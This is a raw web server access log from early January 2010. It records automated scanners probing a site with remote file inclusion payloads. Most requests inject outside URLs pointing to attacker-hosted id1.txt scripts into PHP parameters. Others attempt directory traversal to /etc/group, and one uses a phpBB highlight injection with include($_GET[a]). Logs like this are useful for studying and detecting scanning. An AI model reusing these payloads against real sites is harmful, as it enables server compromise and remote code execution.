60.251.165.181 - - [04/Jan/2010:01:02:07 -0800] "GET /logs/access_091130.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [04/Jan/2010:01:02:20 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [04/Jan/2010:01:02:27 -0800] "GET /logs/access_091221.log///skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [04/Jan/2010:01:02:27 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:03:33 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:03:33 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:03:33 -0800] "GET /logs/access_091228.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:04:09 -0800] "GET /logs/access_090921.log//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:04:14 -0800] "GET /logs/access_090921.log//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.120 - - [04/Jan/2010:01:04:22 -0800] "GET /labia/?M=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:04:49 -0800] "GET /logs/access_090921.log//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:05:44 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:05:44 -0800] "GET /logs/access_091228.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:05:44 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:06:05 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:01:06:05 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:01:06:05 -0800] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:01:06:05 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:01:06:05 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:01:06:05 -0800] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.53.110.2 - - [04/Jan/2010:01:06:37 -0800] "GET /logs/access_091221.log//modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:01:06:37 -0800] "GET /logs/access_091221.log//modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
89.186.1.54 - - [04/Jan/2010:01:08:07 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.186.1.54 - - [04/Jan/2010:01:08:07 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.186.1.54 - - [04/Jan/2010:01:08:07 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.186.1.54 - - [04/Jan/2010:01:08:17 -0800] "GET /logs/access.log///skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.186.1.54 - - [04/Jan/2010:01:08:17 -0800] "GET //skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.186.1.54 - - [04/Jan/2010:01:08:17 -0800] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:01:10:08 -0800] "GET /logs/access_090622.log//faqsupport/samplefaqsupport.php?path[docroot]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:10:08 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:10:08 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:01:11:14 -0800] "GET /logs/access.log%20//modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:01:11:15 -0800] "GET /logs/access.log%20//modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:13:48 -0800] "GET /logs/access_090706.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:14:38 -0800] "GET /logs/access_090622.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:16:58 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:01:16:58 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:01:16:58 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:01:31:48 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:31:48 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:31:48 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:33:10 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:01:33:14 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:01:33:14 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:01:33:55 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:33:55 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:33:55 -0800] "GET /logs/access_091026.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:01:35:18 -0800] "GET /skin/%20/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:01:35:18 -0800] "GET /logs//skin/%20/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:01:35:19 -0800] "GET /logs/access_091207.log%20%20//skin/%20/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:01:35:25 -0800] "GET /logs/access_090601.log%20%20//skin/%20/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:01:36:10 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:01:36:10 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:01:36:10 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:37:29 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:37:29 -0800] "GET /?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:37:29 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:37:41 -0800] "GET /logs/access_091123.log%20%20//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:01:38:02 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:01:38:02 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:01:38:02 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:38:04 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:38:04 -0800] "GET /logs/access_091123.log%20%20//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:38:04 -0800] "GET /?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:38:04 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:38:57 -0800] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:38:57 -0800] "GET /logs/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:38:57 -0800] "GET /send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:39:12 -0800] "GET /send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:39:22 -0800] "GET /logs/access_091228.log%20%20/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:39:26 -0800] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:39:26 -0800] "GET /logs/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:39:37 -0800] "GET /logs/access_091228.log%20%20/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:01:45:48 -0800] "GET /logs/access_090601.log//skin/%20/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:01:45:51 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:01:45:51 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:01:45:54 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:01:46:25 -0800] "GET /logs/access_090928.log//skin/%20/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:46:26 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:46:31 -0800] "GET /logs/access_091123.log//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:46:54 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:46:54 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:46:54 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:46:54 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:46:54 -0800] "GET /logs/access_091123.log//?path%5Bdocroot%5D=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:01:46:58 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:01:46:58 -0800] "GET /logs/access_091123.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:01:46:58 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:47:38 -0800] "GET /logs/access_091123.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:47:38 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.9561212.ru/id1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:47:38 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.9561212.ru/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:04 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:04 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:04 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:04 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:05 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:05 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:09 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:09 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:09 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:48:12 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:49:01 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:49:11 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:49:21 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:49:44 -0800] "GET /logs/access_091116.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.74 - - [04/Jan/2010:01:50:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:01:50:31 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [04/Jan/2010:01:50:32 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
170.210.192.78 - - [04/Jan/2010:01:50:35 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:01:50:54 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:50:55 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:50:55 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.74 - - [04/Jan/2010:01:51:15 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
